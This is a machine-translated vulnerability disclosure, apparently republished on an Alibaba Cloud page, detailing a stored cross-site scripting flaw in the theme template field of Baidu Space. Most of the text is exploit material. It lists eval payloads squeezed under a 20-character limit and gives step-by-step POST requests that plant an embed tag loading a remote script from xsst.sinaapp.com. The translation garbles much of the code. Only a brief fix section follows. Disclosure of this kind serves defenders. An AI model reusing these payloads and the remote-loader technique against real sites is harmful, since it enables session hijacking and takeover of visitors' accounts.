New Baidu space storage type XSS

Source: Internet
Author: User

The new version of Baidu space does not filter the XSS, but can be used, the length is limited to 20 length, remove the constructor at both ends, only 16 length. It is still the old method. The eval (X) and eval (name) methods are indirectly used, so we will not consider them first, we still give priority to finding a location where ID = "X" can be injected, and then...


1. The vulnerability appears in the selection of the new Baidu space template.
2. defect address: http://hi.baidu.com/set/submit/theme
3. defect parameter: template
4. Cause of defect: no input/output filtering is performed except for 20 characters.
5. After the custom content is injected, theme will appear in the following code on the space homepage and various article pages.
 
Window. CurrentApplyedTpl = '{template content }';
6. Based on this, we can construct the malicious code as follows:
 
Window. CurrentApplyedTpl = ''; eval (XXX) // '; // XXX indicates a variable that can be controlled.
7. XXX optional objects
'; Eval (qUserInfo. spaceName) // <-- 29 length, not available
'; Eval (M. innerHTML) // <-- 21 characters in length.
'; Eval (M. title) // <-- 17 Length
'; Eval (M. name) // <-- 16 Length
'; Eval (M. alt) // <-- 15 Length
'; Eval (M. src) // <-- 15 characters in length
8. Based on the above considerations, we have to find a location where we can write id = "M" attribute name = "eval code ".
However, after testing, the label in the article published by Baidu space cannot write the id attribute.
9. Fortunately, the <embed> </embed> label can be used directly by random tests (is it a legacy space ?) Www.2cto.com
Fortunately, <embed> </embed> can also write the title attribute. (Other alt and name cannot be written. src must start with http)
10. Therefore, we can construct the following exploitation steps.
 
Procedure:
 
A. POST http://hi.baidu.com/set/submit/theme
POSTDATA
Template = '; eval (M. title) // & bdstoken = {my token} & qing_request_source =
 
B. publish an article at will. Modify the content of POST to the following:
POST http://hi.baidu.com/pub/submit/modifytext
POSTDATA (parameters other than content are omitted)
Content = encodeURIComponent (<div> <p> <embed src = "http://www.toolmao.com" id = "M" title = "(function () {var s = document. createElement ('script'); s. src = 'HTTP: // xsst.sinaapp.com/m.js'?document.body.appendchild (s)}) () "</p> </div>)
 
C. This article becomes a Cross-Site Page.
Vulnerability proof

Test Platform: Win7 + Chrome, IE
 
Effects in Chrome
 
 
 


 
 
Effect of IE
 
 
 
 
 
 
Solution:
 
 
1. http://hi.baidu.com/set/submit/theme filter template content
2. The new version of the http://hi.baidu.com/pub/submit/modifytext space is still using the embed label? Even if it is used, the id can be filtered out like the img.
 
Author gainover

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.